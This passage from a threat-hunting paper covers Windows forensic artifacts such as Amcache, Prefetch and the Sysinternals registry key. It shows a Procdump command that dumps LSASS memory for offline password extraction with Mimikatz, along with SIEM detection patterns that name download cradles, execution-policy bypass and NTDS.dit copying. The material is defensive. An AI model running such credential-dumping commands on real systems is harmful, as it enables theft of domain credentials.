4/12/2020 17:29 650ecd30e34570bc455030d8db0d854a176108b3	c:\users\rayan\desktop\sysinternalssuite\ctrl2cap.amd.sys	ctrl2cap.amd.sys	.sys	ctrl2cap	10104
4/12/2020 17:29 545f885f31333d1207f7cca593b6ff3c0dffd89a	c:\users\rayan\desktop\sysinternalssuite\ctrl2cap.exe	ctrl2cap.exe	.exe		150328
4/12/2020 17:29 83626cd680a1be177f796c3c6e6bede936222fca	c:\users\rayan\desktop\sysinternalssuite\ctrl2cap.nt4.sys	ctrl2cap.nt4.sys	.sys	ctrl2cap	2864
4/12/2020 17:29 34e1a6d2421f2cab29798401ce303dbf5c83b956	c:\users\rayan\desktop\sysinternalssuite\ctrl2cap.nt5.sys	ctrl2cap.nt5.sys	.sys	ctrl2cap	2832
3/8/2020 19:08 5188b88c2911170ccc47bd462404fb3ece17a99c	c:\program files\cuassistant\culauncher.exe	culauncher.exe	.exe	microsoft® windows® operating system	369696
4/12/2020 17:29 c3e06eba04e67cc244bfcfa76f89316d0c557160	c:\users\rayan\desktop\sysinternalssuite\dbgview.exe	Dbgview.exe	.exe	sysinternals debugview	914992
4/12/2020 17:29 c415d6904ac23599ea53b4f8ee4acbba8bfeb0f2	c:\users\rayan\desktop\sysinternalssuite\desktops.exe	Desktops.exe	.exe	desktops	116824
4/11/2020 0:38 52d35af657197bfad1d6a40fc278eae586d78ccf	c:\windows\system32\devicecensus.exe	DeviceCensus.exe	.exe	microsoft® windows® operating system	35128

Figure 44. Amcache Results.

We can see that two malicious files (install.exe & test.exe) have been executed on the machine with different times. Note that Amcache stores SHA1 hash (same hash for the two files).

5.6 Dumping LSASS Process (Procdump)

Many of the red teamers use Procdump tool for malicious activities in order to get a high privilege in the machine or domain admin privileges. Basically, they use the tool (Procdump) to dump the LSASS process from memory and then download the DMP file in the attacker's machine in order to use such offline tools like Mimikatz to extract the passwords of the logged in users in a clear text (or NTLM hash). The Procdump tool is a legit tool from Sysinternals by Microsoft and used on Windows environments.

C:\Users\rayan\Desktop>procdump64.exe -accepteula -ma lsass.exe l	sass.dmp
ProcDump v9.0 – Sysinternals process dump utility Copyright (C) 2009–2017 Mark Russinovich and Andrew Richards Sysinternals – www.sysinternals.com	
[23:45:48] Dump 1 initiated: C:\Users\rayan\Desktop\lsass.dmp [23:45:49] Dump 1 writing: Estimated dump file size is 35 MB. [23:45:49] Dump 1 complete: 35 MB written in 0.9 seconds [23:45:49] Dump count reached.	

Figure 45. Procdump Basic Command.

In figure 45, we demonstrated that an attacker or a red teamer has executed the Procdump tool to dump the LSASS process to get the DMP file (lssas.dmp in our case).

We can hunt this activity by reviewing the below registry key (as explained previously):



Figure 46. Registry Key for Procdump Activity.

As you can see in figure 46, there is a registry key to record any executed Sysinternals tools. Whenever an attacker (or any user) has accepted the Eula (accepteula), a new record will be created in this registry key: HKEY_CURRENT_USER\Software\Sysinternals\ We can also detect this activity from the Prefetch as shown below in figure 47:

19 WinPrefetchView							
File Edit View Options Help							
× 🖬 3 % 🖻 λ 🦸							
Filename	Created Time	Modified Time 🧳	File Size	Process EXE	Process Path	Run Counter	Last Run Time
SVCHOST.EXE-000A8396.pf	3/8/2020 10:31:01 PM	3/8/2020 11:03:24 PM	11,590	SVCHOST.EXE	C:\Windows\System32\svchost.exe	2	3/8/2020 11:02:50 PM, 3/8/2020 10:30:27 PM
SVCHOST.EXE-5931E67A.pf	3/8/2020 10:31:14 PM	3/8/2020 11:03:24 PM	4,138	SVCHOST.EXE	C:\Windows\System32\svchost.exe	2	3/8/2020 11:02:59 PM, 3/8/2020 10:31:04 PM
WMIAPSRV.EXE-CF150EEA.pf	3/2/2020 2:08:20 PM	3/8/2020 11:03:24 PM	6,412	WMIAPSRV.EXE	C:\Windows\System32\wbem\WmiApSrv.exe	12	3/8/2020 11:03:01 PM, 3/8/2020 10:30:38 PM, 3/7/2020 8:29:05 PM, 3/7/
REGEDIT.EXE-246AC210.pf	3/3/2020 9:57:39 PM	3/8/2020 11:03:24 PM	10,268	REGEDIT.EXE	C:\Windows\regedit.exe	3	3/8/2020 11:03:04 PM, 3/3/2020 9:58:24 PM, 3/3/2020 9:57:29 PM
WINPREFETCHVIEW.EXE-D5BD87B	3/7/2020 7:30:47 PM	3/8/2020 11:03:41 PM	35,553			4	3/8/2020 11:03:31 PM, 3/7/2020 8:56:11 PM, 3/7/2020 7:34:06 PM, 3/7/2
E BACKGROUNDTASKHOST.EXE-65B	3/2/2020 2:50:29 PM	3/8/2020 11:04:09 PM	23,278	BACKGROUNDTASKH	C:\Windows\System32\BACKGROUNDTASKHOST.EXE	7	3/8/2020 11:04:08 PM, 3/8/2020 10:30:56 PM, 3/7/2020 8:28:10 PM, 3/7/
SVCHOST.EXE-E968C7A7.pf	3/8/2020 10:31:12 PM	3/8/2020 11:04:23 PM	8,028	SVCHOST.EXE	C:\Windows\System32\svchost.exe	2	3/8/2020 11:04:13 PM, 3/8/2020 10:31:02 PM
POWERSHELL.EXE-022A1004.pf	3/4/2020 7:09:33 PM	3/8/2020 11:04:37 PM	68,950	POWERSHELL.EXE	C:\Windows\System32\WINDOWSPOWERSHELL\v1.0\POWERSHELL.EXE	6	3/8/2020 11:04:27 PM, 3/5/2020 8:09:10 PM, 3/4/2020 7:11:34 PM, 3/4/2
SEARCHFILTERHOST.EXE-10E4267	3/2/2020 2:04:18 PM	3/8/2020 11:04:57 PM	4,092	SEARCHFILTERHOST	C:\Windows\System32\SEARCHFILTERHOST.EXE	89	3/8/2020 11:04:47 PM, 3/8/2020 10:10:42 PM, 3/7/2020 10:26:36 PM, 3/
F PROCDUMP64.EXE-222E27B5.pf	3/8/2020 10:21:12 PM	3/8/2020 11:05:57 PM	5,665	PROCDUMP64.EXE	C:\Users\Rayan\Desktop\SYSINTERNALSSUITE\PROCDUMP64.EXE	3	3/8/2020 11:05:47 PM, 3/8/2020 10:31:57 PM, 3/8/2020 10:21:02 PM
E DLLHOST.EXE-38926D07.pf	3/2/2020 1:57:47 PM	3/8/2020 11:09:20 PM	4,410	DLLHOST.EXE	C:\Windows\System32\dllhost.exe	50	3/8/2020 11:09:09 PM, 3/8/2020 11:04:09 PM, 3/8/2020 10:22:16 PM, 3/
MPCMDRUN.EXE-5DFFF76C.pf	3/8/2020 10:23:15 PM	3/8/2020 11:12:54 PM	4,328	MPCMDRUN.EXE	C:\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\Platform\4.18	3	3/8/2020 11:12:43 PM, 3/8/2020 10:40:32 PM, 3/8/2020 10:23:05 PM
CONHOST.EXE-F98A1078.pf	3/2/2020 2:07:42 PM	3/8/2020 11:21:08 PM	9,719	CONHOST.EXE	C:\Windows\System32\conhost.exe	79	3/8/2020 11:20:58 PM, 3/8/2020 11:12:43 PM, 3/8/2020 11:04:27 PM, 3/8
🛗 DEFRAG.EXE-22AD8A37.pf	3/2/2020 2:19:37 PM	3/8/2020 11:21:08 PM	5,368	DEFRAG.EXE	C:\Windows\System32\Defrag.exe	4	3/8/2020 11:20:58 PM, 3/7/2020 8:48:26 PM, 3/3/2020 7:00:16 AM, 3/2/
CMD.EXE-CD245F9E.pf	3/2/2020 2:50:16 PM	3/8/2020 11:22:04 PM	3,376	CMD.EXE	C:\Windows\System32\cmd.exe	20	3/8/2020 11:22:04 PM, 3/8/2020 10:33:19 PM, 3/8/2020 10:30:58 PM, 3/8

Figure 47. Prefetch Results for Procdump.

In figure 47, you can see the Prefetch results for the Procdump activity as well as some data like the last execution time, how many times has been run, the created time, the path of the executed tool and other information that Prefetch provides.

Benjamin, the author of the Mimikatz, has created a YARA Rule to detect any use of DMP file by LSASS process. If you are not sure if there is any LSASS DMP file in your machine or in the domain, simply use the rule and fire it on the machine:

0 - 1 11		
C:\Use	rs\rayan\	Jesktop/yara-3.9.0-winb4/yarab4.exe_kiwi_passwords.yar.txt =r C:\ > results.txt
error	scanning	C:\\Boot\BCD: could not open file
error	scanning	C:\\Boot\BCD.LOG: could not open file
error	scanning	C:\\pagefile.sys: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.6.Crwl: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.6.gthr: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\MSStmp.log: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.wid: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.wid: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.wsb: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows.Windows.edb: could not open file
error	scanning	C:\\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb: could not open file

Figure 48. YARA Rule to Detect LSASS DMP File.



Figure 49. YARA Results.

We can see in figure 49 that the YARA rule has detected a DMP file. The DMP file is indeed an LSASS DMP file that has been matched to the rule. (which is the same we found previously).

Note that you can find all the used tools and resources for the all the demonstrated scenarios in the reference section.

6. Hunting with SIEM

Most of the enterprises nowadays have implemented such solutions for monitoring their traffic & logs and to have a full visibility over the network and the endpoints and detecting any kind of attacks. Solutions such as Security Information and Event Management (SIEM) is mostly being used in many environments for collecting and analyzing the logs from different resources. In additional to that, the SOC team or the threat hunters could monitor their daily traffic through the use cases. The problem is that most of the built-in use cases in the SIEMs are poorly written and generate a lot of false-positive. Hence, as a best practice, we will create high effective use cases based on the scenarios we just demonstrated; for the purpose of hunting and detecting the red team or attacker activities.

6.1 Psexec Use Case

- Any command that contains: \\IP-Computer_Name AND (-u OR -p) AND (cmd OR cmd.exe) AND -accepteula
- Any running executable: PsExec64.exe **OR** PsExec.exe
- Any file creation for (PSEXESVC.exe)

6.2 Suspicious Commands Use Case

- Any execution policy bypass: -ExecutionPolicy bypass **OR** -ep bypass
- Any attempt to download a file: DownloadString **OR** New-Object Net.WebClient
- PowerShell Remoting: Enter-PSSession
- Any attempt to enumerate the machine or connect to a share: net AND (use OR users OR group OR localgroup OR /domain OR /dom)

6.3 Dumping NTDS.dit file Use Case

- Any commands that contains: create shadow **OR** list shadows
- Any attempt to copy NTDS.dit file: copy AND NTDS.dit

6.4 Procdump Use Case

- Any commands that contains: (-ma lssas.exe OR *.dmp) AND accepteula
- Any running executable: procdump64.exe **OR** procdump.exe

The above use cases are just examples (and not limited to) for creating effective use cases. It might generate false-positive, but as a blue team, it's worth further investigating the matched rules and make sure if it's indeed a false positive or a real malicious activity. However, you could create better use cases than the previously created.

7. Hunting Tips

From the writer perspective, below are some of the threat hunting tips that could help you during a compromise assessment engagement (and it's not necessary to be followed):

- As a threat hunter, you have to cover everything across the environment as possible including the network and the endpoints.
- In the endpoints, monitor and search for processes, file creation, commandline arguments, PowerShell commands, known malicious script types (vbs, bat, ps1), scheduled tasks, services, autoruns, suspicious EXEs, TEMP folder and hidden files.
- In the network, monitor and search for suspicious outbound/inbound connections, access to suspicious web files (php, aspx) continuously, connections with random ports, RDP connections, any spike in the traffic.
- Whenever you find a suspicious activity and you are not fully sure about it, try to investigate that activity until you make a decision that is a false positive or indeed a malicious activity.
- Windows is recording almost everything, so try to find out and understand (what Windows records) and use it for your hunting purposes.
- In case you don't have any security solution for storing the logs (like SIEM, EDR), Windows Events should be your friend.
- Threat intelligence information are a very important for hunting the bad guys. The Indicator of Compromise (IoC) of a previous attack or engagement will help you in the investigation process and hunting a known malicious group.
- A solution like EDR is a good for hunting in a large scale environment, but don't rely on it most of the time (DFIR skills is important).
- There are many artifacts can be found on Windows machines (some of them are covered in this paper), so use the artifacts wisely.
- Remember always to "think like a red teamer or an attacker".
- Before starting the hunting process, assume that the enterprise is already breached and make an assumption for that.

8. Conclusion

As a threat hunter or DFIR specialist, it's important to sweep over the endpoints and the network and try to cover everything as possible for the sake of hunting and detecting the malicious activities. Windows is recording a huge amount of user activity, and we, as threat hunters, have to focus on the artifacts (and other data) in order to catch any suspicious activity and proceed our investigation during a compromised assessment or an incident. In this research paper, we have covered some of the red team activities that we observe many times and we used some of the artifacts to hunt the bad guys. However, there are still many techniques that the red teamers or the attackers can use over the machines and the domain. Hence, you have to be always ready for any kind of attack and prepare the team and the technology to defeat the attackers and protect your assets from the enemies.

9. References

- https://www.andreafortuna.org/2018/05/23/forensic-artifacts-evidences-ofprogram-execution-on-windows-systems/amp/
- https://ericzimmerman.github.io/#!index.md
- https://malicious.link/post/2013/2013-06-10-volume-shadow-copy-ntdsditdomain-hashes-remotely-part-1/ https://jpcertcc.github.io/ToolAnalysisResultSheet/details/vssadmin.htm
- https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
- https://yara.readthedocs.io/en/stable/
- https://github.com/gentilkiwi/mimikatz/blob/master/kiwi_passwords.yar
- https://docs.microsoft.com/en-us/sysinternals/downloads/